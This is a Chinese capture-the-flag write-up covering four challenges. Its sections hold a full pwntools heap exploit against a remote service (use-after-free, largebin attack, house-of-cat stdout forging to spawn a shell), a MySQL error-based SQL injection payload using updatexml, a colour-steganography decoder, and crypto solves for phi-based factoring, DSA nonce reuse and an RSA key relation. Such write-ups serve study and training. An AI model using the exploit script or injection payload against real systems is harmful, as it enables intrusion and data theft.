2022年8月24日23:05:57评论299 views字数 10242阅读34分8秒阅读模式

解题思路

PWN

glibc_master

free的时候没有清零uaf漏洞，还可以无限制edit，只是edit的时候其实有一个加密所谓加密其实就是一个异或的过程只要再异或一次就能解密，add的时候限制大小。由于没有给libc我show了一次因为我本地是2.31-9.9的libc然后减了一下得到libcbase发现刚好是0x1000对齐，所以既然是2.31版本就有各种hook，但是free_hook和malloc_hook被ban了，但是用了puts函数关于io调用链所以用largebinattack攻击mp_结构体中的tcache大小就能将tcache扩大然后在IO_2_1_stdout伪造house of cat就能getshell


#encoding: utf-8#!/usr/bin/pythonfrom pwn import*import sys#context.log_level = "debug"context.arch="amd64"binary_name = "glibc_master"libc_name = "libc-2.31.so"ld_name = "ld"local = 1version = "9.7"elf =ELF("./"+binary_name)libc = ELF("/home/chen/glibc/{}/{}/{}".format(libc_name,version,libc_name))#ld = ELF("./"+ld_name)se      = lambda data               :io.send(data) sa      = lambda delim,data         :io.sendafter(delim, data)sl      = lambda data               :io.sendline(data)sla     = lambda delim,data         :io.sendlineafter(delim, data)rc      = lambda num                  :io.recv(num)rl      = lambda :io.recvline()ru      = lambda delims             :io.recvuntil(delims)uu32    = lambda data               :u32(data.ljust(4, b'x00')) uu64    = lambda data               :u64(data.ljust(8, b'x00'))info    = lambda tag, addr          :log.info(tag + " -------------> " + hex(addr))ia        = lambda :io.interactive()if local==1:    io = remote("123.56.77.227",18779)else:    io = process("./"+binary_name)

def debug():    gdb.attach(io,''' ''')    pause()def add(index,size):    sla(">>","1")    sla("input index:",str(index))    sla("input size:",str(size))def edit(index,context):    sla(">>","2")    sla("input index:",str(index))    sla("input context:",context)def show(index):    sla(">>","3")    sla("input index:",str(index))def free(index):    sla(">>","4")    sla("input index:",str(index))def encrypt(data):    s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='    s1=''    x = len(s) for i in range(len(data)):        s1 += chr(ord(s[i%x]) ^ ord(data[i])) return s1





add(0,0x428)add(1,0x410)add(2,0x418)add(3,0x410)free(0)show(0)ru("n")libcbase = uu64(io.recv(6)) - 2018272system_addr=libcbase+libc.sym["system"]stdout_addr = libcbase + libc.sym["_IO_2_1_stdout_"]mp_addr =libcbase + 2015952 #2015952free_hook = libcbase + libc.sym["__free_hook"]

info("stdout_addr",stdout_addr)info("libcbase",libcbase)add(4,0x450)payload = p64(0)*3 + p64(mp_addr-0x20)edit(0,encrypt(payload))free(2)add(5,0x450)free(1)free(3)show(3)ru("n")heap_addr = uu64(io.recv(6))info("heap_addr",heap_addr)payload = p64(stdout_addr)edit(3,encrypt(payload))add(6,0x410)add(7,0x410)fake_IO_FILE = "/bin/shx00"+p64(0)*3fake_IO_FILE +=p64(0)fake_IO_FILE +=p64(0)fake_IO_FILE +=p64(1)+p64(0)fake_IO_FILE +=p64(heap_addr)#rdxfake_IO_FILE +=p64(system_addr)#call addrfake_IO_FILE +=p64(0xffffffffffffffff)fake_IO_FILE = fake_IO_FILE.ljust(0x48, 'x00')fake_IO_FILE += p64(0 ) # _chainfake_IO_FILE = fake_IO_FILE.ljust(0x88, 'x00')fake_IO_FILE += p64(libcbase+2025440) # _lock = writable addressfake_IO_FILE = fake_IO_FILE.ljust(0xa0, 'x00')fake_IO_FILE +=p64(stdout_addr+0x30) #rax1fake_IO_FILE = fake_IO_FILE.ljust(0xc0, 'x00')fake_IO_FILE += p64(0) # _mode = 0fake_IO_FILE = fake_IO_FILE.ljust(0xd8, 'x00')fake_IO_FILE += p64(libcbase+2002784+0x10) # vtable=IO_wfile_jumps+0x10fake_IO_FILE +=p64(0)*6fake_IO_FILE += p64(stdout_addr+48) # rax2edit(7,encrypt(fake_IO_FILE))#debug()ia()



WEB
djangogogo
开启了Debug，但是只有以year或者为month为开头的时候才会产生sql语句错误，从而找到对应的SQL语句
SELECT `Bill`.`id`, `Bill`.`good`, `Bill`.`purchase_date`,  `Bill`.`sale_datetime` FROM `Bill` WHERE EXTRACT(YEAR FROM `Bill`.`sale_datetime`) = (EXTRACT(YEAR OR 1 FROM `Bill`.`purchase_date`))

SELECT `Bill`.`id`, `Bill`.`good`, `Bill`.`purchase_date`,  `Bill`.`sale_datetime` FROM `Bill` WHERE EXTRACT(MONTH FROM `Bill`.`sale_datetime`) = (EXTRACT(MONTH OR 1 FROM `Bill`.`purchase_date`))



这里用到了EXTRACT函数，并且在尝试过程中我们可以发现会默认将所有字符都直接大写，从而不能直接利用Bill数据库绕过，但是可以利用mysql自带的函数来获取时间，然后构造报错注入语句
payload：




?name=YEAR From now())) or updatexml(1,concat("~",(select flag from FLAG),"~"),1)%23

flag:

flag{2c7ac8d2-855e-4ee0-87cc-0f77a3a3b9dc}

MISC
办公室爱情


搜索到密码，根据题目提示，流程应该是word->pdf->ppt

True_lOve_i2_supReMe

pdf的隐写就没几种，要么去掉图片，要么就是wbs43open
然后解出来得到密码




解压得到ppt


简单看一下有8种图片


分别为赤橙黄绿青蓝紫跟白
有绝大部分的黄色后面跟着白色，白色与白色之间的间隔大部分都是3，所以猜测白色是间隔
又因为有7种颜色（除去白色间隔），所以猜测可能为7进制
将颜色拿下来之后，写脚本，7进制转字符串转得到flag




x = '黄红青白黄橙绿白橙紫紫白黄红蓝白黄绿青白橙红红白紫紫白黄黄紫白黄红绿白橙紫青白黄红绿白黄绿橙白橙黄青白黄红绿白橙红红白橙紫青白青蓝白青蓝白青蓝白黄绿紫白'x = x.replace('红','0')x = x.replace('橙','1')x = x.replace('黄','2')x = x.replace('绿','3')x = x.replace('青','4')x = x.replace('蓝','5')x = x.replace('紫','6')x = x.replace('白','_')for i in x.split('_')[:-1]:   print(chr(int(i,7)),end='')#flag{10ve_exCe1_!!!}

CRYPTO
known_phi
在以前积累的CVE库中找到了现成的解已知phi分解n的脚本
后面就是dsa签名k的复用


因为n分解出来的顺序可能不同，所以需要爆破m1和m2
from Crypto.Util.number import inverse, long_to_bytes, bytes_to_longfrom hashlib import sha256from math import gcd# from math import isqrtfrom random import randrangefrom sage.all import is_primedef factorize_multi_prime(N, phi): """ Recovers the prime factors from a modulus if Euler's totient is known. This method works for a modulus consisting of any number of primes, but is considerably be slower than factorize. More information: Hinek M. J., Low M. K., Teske E., "On Some Attacks on Multi-prime RSA" (Section 3) :param N: the modulus :param phi: Euler's totient, the order of the multiplicative group modulo N :return: a tuple containing the prime factors """    prime_factors = set()    factors = [N] while len(factors) > 0: # Element to factorize.        N = factors[0]

        w = randrange(2, N - 1)        i = 1 while phi % (2 ** i) == 0:            sqrt_1 = pow(w, phi // (2 ** i), N) if sqrt_1 > 1 and sqrt_1 != N - 1: # We can remove the element to factorize now, because we have a factorization.                factors = factors[1:]

                p = gcd(N, sqrt_1 + 1)                q = N // p

 if is_prime(p):                    prime_factors.add(int(p)) elif p > 1:                    factors.append(int(p))

 if is_prime(q):                    prime_factors.add(int(q)) elif q > 1:                    factors.append(int(q))

 # Continue in the outer loop break

            i += 1

 return tuple(prime_factors)n = 104228256293611313959676852310116852553951496121352860038971098657350022997841589403091722735802150153734050783858816709247647536393314564077002364012463220999962114186339228164032217361145009468516448617173972835797623658266515762201804936729547278758839604969469770650218191574897316410254695420895895051693phi = 104228256293611313959676852310116852553951496121352860038971098657350022997837434645707418205268240995284026522165519145773852565112344453740579163420312890001524537570675468046604347184376661743552799809753709321949095844960227307733389258381950812717245522599433727311919405966404418872873961877021696812800n_factors = factorize_multi_prime(n, phi)q = 24513014442114004234202354110477737650785387286781126308169912007819s1 = 764450933738974696530033347966845551587903750431946039815672438603r1 = 8881880595434882344509893789458546908449907797285477983407324325035r2 = 8881880595434882344509893789458546908449907797285477983407324325035s2 = 22099482232399385060035569388467035727015978742301259782677969649659# n_factors = (92128261871628241975522014503893089775204276818952562864868068434189077323911, 112949642503320513342506215562619543574731838853984060837858943255064878544009, 87835491118288540715995802690214012778910595141140880257454164067662889225787, 114034877389817517986186253205403596431234414440955842208884285396147740113161)import itertoolsfor i in itertools.permutations([0,1,2,3]):    m1 = long_to_bytes(n_factors[i[0]] + n_factors[i[1]])    m2 = long_to_bytes(n_factors[i[2]] + n_factors[i[3]])    hm1 = bytes_to_long(sha256(m1).digest())    hm2 = bytes_to_long(sha256(m2).digest())    k = inverse((s1-s2),q)*(hm1-hm2) % q    x1 = (s1*k-hm1)*inverse(r1,q) % q    x2 = (s2*k-hm2)*inverse(r2,q) % q if b'flag' in long_to_bytes(x1): print(long_to_bytes(x1))# b'flag{ea16de7-1981-11ed-b58f}'





rsa


from gmpy2 import *from Crypto.Util.number import *n = 0x62c048bc886075bffb9ad01255786dd8ef2480ba510f13689c1e84ffaaf21dfb5695a4d83f4ba22093bdd75bfc8f5979185d29724ecccf045e1857b1b2a4757dd82dc44318c054c9fce9bc451e6beecb97bbda6562420fc8c295521c5455443413f90403cf1af6271fb6d2d54378b86ced18ae6844a877890ea853a215880a09c68c517a75c1183c067b706ce630f3f0913591f7354cfa60c8f6b7ab2f15e466a1ea6e8034417a5fc3c11b8ba746596c22c734b09257e9a6fb18358738d416eda0ba0e7b028dd2d550b1e018b180916ac25f47910657a5db2410946c0593b7e23ed1659a811083f363ad4eb65642091a040befbd643089bbee376634d2394d11e1 = 0x124241a12ea2be53f9b9b1fd92e10d089cfa32aa07e6c2cace848aaa6c73ff06d4c6c92b7d1f29160b2eef95a5f580915d3f15c0ea23975cbadfe8347a10daab2bd0827d7e909b329ec53c5eb306f0a5125b3817e7ea0c15b2317a46c36c4f34fc626dadc6c769bcc7be18ddf7954fae8dde3fd4ce3c5146c019bdb0d9552af1dc9ef7186e06b1d59e763fb05c7cd21fbb3f509fee52d4e24921ebfa76bb8302ea6760e92606e440907cc1c110946af53900904e84dbc309fcef15ea060c667070e5e0310891606df151609ff609bcc6125c6043c35119b25df78b4d5ca61ab6492753cc5e5b32e044fce0aeb0442464f36298add254e9fb6505fa4cddae1cf7e2 = 0x17b3937cec3ca5fdddad8db29c6dc4efae1408bf5b4aa2ff602112c50f302e9698c79c7ab79fef0210c621dcc218d91d358b7f93a978c4e3f2b982794697c4797cef89189d1464ed1c767bf72433092922352885f8e355952c558ad2c9ade58a19375ddc5dcf3f9fa28c68a5cff158734d94224b85f77bd939133f39ab7884ece61d9fb3496373008827c2ae694dfe7da08eee348ef99c3a6737a4b088b62978cf209ef3d1140a30d42872615b94378108266e3d344caf51b497a585a4b5ef8619cc46959bad9b89f59f36175fbf9b64363443f3f7743896c72a198decedf89c518fa07b1d401d0359578a4926b7d67de86232ee24751f17dafbc749c0783b33e3 = 0x5647c4490bda9e7e497651551600572c5ef4e2d889b9b1ba0e9a493660497e10877e975c01da9aebae5e3ba9aad976a1a783b39191e8fd799689dfa26b069264d60543602d514ac412ac75d827d67c78ad544bda633f0fa69fb5bbc37e0f6b95714576ff53bae3f7f991d143a4b1e841730d5d580d4effeb8fb02e8b3c3c9a1f1899d2eb411ce37f16d30cfa1f7af7322be4f42f5d012f484a1181fa4aa0b5f420a472030a5c08c80bff76ab82ef5768bfd495abcdc5f22aae1891561322dfb28ff63c4e467411c8b73c11d64b05f411e2a1de0c7754c6a62d1f72cded9e2592ccc21be3fce4ea6f083a617a246fd3fe464ef2487adbfabfb628c882ea991675c = 0x45f2ee650d622d1e0f0e2e2e861001e9866c541f9f1dd2ec1dec18194f8b7224914916ecd68bbc74b28a000d2664e671586aed63b54c0928a939caf28d39eeba03c0ce3afcf2cdc5805e8e2792d76e88545aa4dee11078ba1e2e5b56ee23d58e443d7aff180d4e7463ae66ea8e96e0c8d4e1443e7664b99599af14e591e28cf2f833bd30b44b89c396b5fc1ee81ea3f7bc08dab426b1871eb66829c81d57e2ebf5c7a3e9c593ce496f0b0c4237906b019ae75ca551d6b0b1adfe64958c2ead6c39e517eb75eaf4b4d72402bea40f043cf0a80317aa2f1a996c727e195e15f903c0cac618f668af1015ee479d1c7b1c1b370fd4a5a76f5bf295e6bd7d0f4ae56fl0 = 0x3dbabf6ea5b801221c283bd234f04264d292c8f3048c8b59c21e003cda983a3a41e4392c6ea77a706631de60d261f2b367027e037d37fda5a13a8e01b2c6c0f48a3112315cffe7420a50a3ebada09aba61f8e6da793654a467b9f780c20c5085012e064ab9205c076073b4fb4895e01d0d568fd5c30159879180093855d39d5548a1389a94f57c680ckphi = e1 - e2 + l0 * e1 * e2d3 = inverse(e3,kphi)d1 = inverse(e1,kphi)d2 = inverse(e2,kphi)assert d1 - d2 == l0print(long_to_bytes(pow(c,d3,n)))# b'flag{-oh!!h0w_c4N_Y0u_sOlVe_th15_d_bouNd_of_RSA???_}'